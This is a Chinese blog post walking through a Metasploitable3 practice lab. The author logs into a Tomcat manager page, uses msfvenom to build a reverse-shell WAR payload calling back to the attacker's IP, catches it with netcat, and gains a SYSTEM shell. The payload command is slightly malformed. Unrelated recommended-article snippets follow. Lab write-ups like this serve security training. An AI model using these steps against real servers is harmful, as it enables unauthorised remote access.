另一种方法

最新推荐文章于 2021-02-19 07:18:51 发布
最新推荐文章于 2021-02-19 07:18:51 发布
阅读量3.8k 收藏
点赞数 1
分类专栏: 安全 文章标签: metasploitable3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/avasy/article/details/86761362
版权

上一次
拿到tomcat用户名和密码后,可以从tomcat入手,在管理页登录

这里显示能上传一个.war文件,我用msfvenom生成一个war的后门

msfvenom -p windows/x64/shell_reverse_tcp -f LHOST=192.168.0.108 LPORT=4545

payload.war

这次不用metasploit,改用netcat侦听4545端口

然后将生成的payload.war用jar分离出.jsp
文件:
jar -xvf payload.war


将payload.war上传到靶机,运行
deploy,网页跳转,
访问
http://192.168.0.104:8282/payload/cugxcageiouu.jsp来激活payload

nc侦听那边已经显示拿到shell了,whoami查一下,还是system权限



所以可以来猎杀那些flag了

不过nc的shell远不如meterpreter方便

avasy
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hugo-bearblog:Hu基于»熊博客«的雨果主题。 免费,免费,超快速的博客。 现在,该主题包括支持深色模式:black_large_square:的深色方案!
04-28
雨果ʕ•ᴥ•ʔBear Blog :teddy_bear: 基于主题。 免费,免费,超快速的博客。 演示版 有关此主题的最新演示,请查看 :bullseye: 。 屏幕截图 :white_large_square: :black_large_square: 当用户的浏览器运行“深色模式”时,深色方案将自动使用。 默认为浅色/白色配色方案。 出 -file实现。 赞助 :heart_decoration: 通过(定期)或 (一次性)支持我在该主题上的工作。 安装 如果您的计算机上已经有一个Hugo网站,则只需通过以下方式添加此主题 git submodule add https://github.com/janraasch/hugo-bearblog.git themes/hugo-bearblog 然后,如下所述调整config.toml 。 有关更多信息,请阅读Hugo的官方设置指南。 调整配置/ config.toml 请查看此主题的exampleSite中包含的config.toml 。 内容与结构
2019-12-20
qq_46059644的博客
12-20 1万+
只移动一个数(https://img-blog.csdnimg.cn/20191220135409303.jpeg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MDU5NjQ0,size_16,color_FFFFFF,t_70) ...
I will be better for you.
千羽的博客
03-18 1万+
Every step I have took,just for being closer to you.
MLAPP Chapter2 信息论
大胖熊的博客
07-13 8761
2.8 信息论 信息论关注的是以一种紧凑的方式表示数据(一种称为数据压缩或源代码编码的任务),以及以一种对错误(一种称为错误修正或信道编码的任务)鲁棒性很好的方式传输和存储数据。 起初,这似乎与概率论和机器学习的关注点相去甚远,但实际上有一种亲密的联系。要了解这一点,请注意,紧凑地表示数据需要将短码字分配到可能性高的位字符串,并将较长的码字保留到不太可能的位字符串。 这与自然语言中的情况类似...
千羽心寻(丫头)
我自有傲骨,不念过往,不畏将来!
02-02 2376
曾经的我,以为世界很小,总会相遇。   曾经的我,以为朋友很少,但是珍惜。   曾经的我,以为人生很短,值得守候。   曾经的我,以为开心就好,不断索取。   曾经的我,以为你就是天,不想离开。   后来,   终于懂得,一切的一切,不过是一场梦。   梦里有多开心,   梦醒时,就有多悲伤。 丫头,以后没人会这么叫你了,不哭,好吗?   是时候了,该醒了。 记得那一年,
提供学校心理服务的另一种方法
06-29
提供学校心理服务的另一种方法 提供学校心理服务的另一种方法 LONNY W. MORROW 东北密苏里州立大学 学校心理学家经常因为没有影响转介给他们的学生而受到批评。 本文描述了作者作为学校心理学家成功实施以消除这种...
电源技术中的MAX232获得正负电源的另一种方法
12-07
MAX232获得正负电源的另一种方法 在单片机控制系统中,我们时常要用到数/模(D/A)或者模/数(A/D)变换以及其它的模拟接口电路,这里面要经常用到正负电源,例如:+9V,-9V;+12V,-12V.这些电源仅仅作为数字和模拟控制...
vwordnet:看WordNet的另一种方法
05-11
看另一种方法。 有很多WordNet查看器(请参阅此)。 此Web应用程序将同义词集层次结构(hypernyms / hyponyms)显示为具有固定宽度级别的水平树。 安装: 须藤apt-get install libffi-dev virtualenv --no-site-...
从辅助线程调用UI的另一种方法
04-11
标题“从辅助线程调用UI的另一种方法”涉及到的是如何安全地更新UI元素,这通常是一个多线程编程的问题。在.NET框架中,尤其是C#环境下,不正确地操作UI元素可能会导致线程冲突或应用程序崩溃。下面我们将详细讨论这...
让input不可点击的另一种方法
01-19
测试 2009-2-10 [Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]
谷歌地球(破解版)价值400美元
01-12
谷歌地球(破解版)价值400美元
JAVA简述
Leo_千羽
12-01 4808
一 、高级语言的运行机制 计算机高级语言按程序的执行方式可以分为编译型和解释型两种. 编译型语言是指使用专门的编译器,针对特定平台(操作系统) 将某种高级语言源代码一次性 "翻译" 成可被该平台硬件执行的机器码, 并包装成该平台所能识别的可执行性程序的格式,这个转换过程称为编译。 解释型语言是指使用专门的解释器对源程序逐行解释成特定平台的机器码并立即执行的语言。
大话谈VUE之const,var,let
千羽公子的专栏
06-20 1万+
刚接触vue的时候,用的最多的就是var,觉得就是声明变量的,再深入就没有了解了,借着这次的项目,稍微深入了解一下这几个东西。 vue-var 用var命令声明的变量,是在全局范围内有效的,举栗子: var a = []; for (var i = 0; i < 10; i++) { a[i] = function () { console.log(i); };...
【2021亲测有效】彻底解决Google地球、Google Earth、谷歌地球启动无法连接到登录服务器、启动黑屏、无法查看历史影像图的方法
热门推荐
大懒熊
02-19 10万+
近期Google地球、Google Earth、谷歌地球pro版本启动后提示无法连接到登录服务器或者启动后黑屏,可能是DNS污染、IP屏蔽、协议问题或者网络问题,以下介绍三种方法解决。先说结果:第一种修改host文件方法可能行不通,后续也要更新hosts文件,连接可能不稳定;第二种方法是使用免费加速器,可彻底解决此问题;第三种方法就是使用替代的国产软件,如图新地球、奥维地球等。
NameError
weixin_41895381的博客
06-26 5115
if name== ‘main’: main() NameError: name ‘name’ is not defined 报错原因:因为_'if _name__== '_main_':这里的下划线是一个 改正方法:if __name__== '__main__':把下划线改成两个就可以了
Adam优化算法详细解析
luoxuexiong的博客
05-21 10万+
本文转载于以下博客地址:http://www.atyun.com/2257.html 如有冒犯,还望谅解! Adam优化算法是一种对随机梯度下降法的扩展,最近在计算机视觉和自然语言处理中广泛应用于深度学习应用。在引入该算法时,OpenAI的Diederik Kingma和多伦多大学的Jimmy Ba在他们的2015 ICLR发表了一篇名为“Adam: A Method for Stochast...
MLAPP Chapter2 概率论回顾
大胖熊的博客
07-10 446
2 概率 Probability 2.1 介绍 概率论只不过是把常识简化为计算——皮埃尔拉普拉斯 在前一章中,我们看到概率如何在机器学习中发挥作用。在本章中,我们将更详细地讨论概率论。 让我们先停下来问一下:概率是什么? 我们都熟悉“硬币正面落地的概率是0.5”这句话。但这是什么意思呢?实际上对概率至少有两种不同的解释。一种叫做频率论(frequentist)解释,在此观点中,...
numpy 稀疏矩阵
低端博客
05-30 1万+
scipy.sparse.coo_matrix是三元组,不能按行也不能按列切片 to_csr  是按行压缩的稀疏矩阵,可以按行切片 to_csc 是按列压缩的稀疏矩阵,可以按列切片 关于压缩存储的格式,见这里http://www.tuicool.com/articles/A3emmqi
python spark pyspark——朴素贝叶斯习题整理
weixin_41895381的博客
05-06 1178
贝叶斯分类:在做算法时数据不能为负我就将原来数据中的负号去掉导致结果预测失败 优点:在数据较少的情况下仍然有效,可以处理多类别问题。 缺点:对于输入数据的准备方式较为敏感。 适用数据类型:标称型数据。 #1.导包 from pyspark.ml.classification import NaiveBayes from pyspark.ml.evaluation import Multiclas...
命令解释器有两种不同的方式来处理命令。一种方法是允许命令解释器包含执行命令所需的代码。另一种方法是通过系统程序实现命令。比较和对比这两种方法
最新发布
03-29
一种方法是在命令解释器中包含执行命令所需的代码,这种方法有以下优点: 1. 简单易用:用户只需要输入命令,命令解释器就会自动执行对应的代码,无需额外学习和了解命令的实现细节。 2. 灵活性高:由于执行命令的代码被封装在命令解释器中,因此可以很方便地对其进行修改和扩展。 3. 效率较高:由于执行命令的代码直接嵌入在命令解释器中,因此可以减少系统调用的次数,提高程序的执行效率。 但这种方法也有以下缺点: 1. 维护成本高:由于命令解释器中包含了大量的执行命令的代码,因此需要花费较多的时间和精力来维护和更新这些代码。 2. 安全性差:由于命令解释器可以执行任意的代码,因此存在被恶意利用的风险。 另一种方法是通过系统程序实现命令,这种方法有以下优点: 1. 安全性高:由于系统程序的代码被固定在了系统中,无法被用户篡改,因此具有较高的安全性。 2. 维护成本低:由于系统程序的代码是固定的,因此只需要在必要时进行更新,维护成本较低。 但这种方法也有以下缺点: 1. 学习成本高:由于用户需要了解系统程序的使用方法,因此需要投入较多的时间和精力来学习。 2. 灵活性低:由于系统程序的代码是固定的,因此无法随意修改和扩展。 综上所述,两种不同的方式各有优缺点,具体选择应根据实际情况来考虑。如果需要灵活性高、效率高的命令解释器,则可以选择第一种方法;如果需要安全性高、维护成本低的命令解释器,则可以选择第二种方法

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值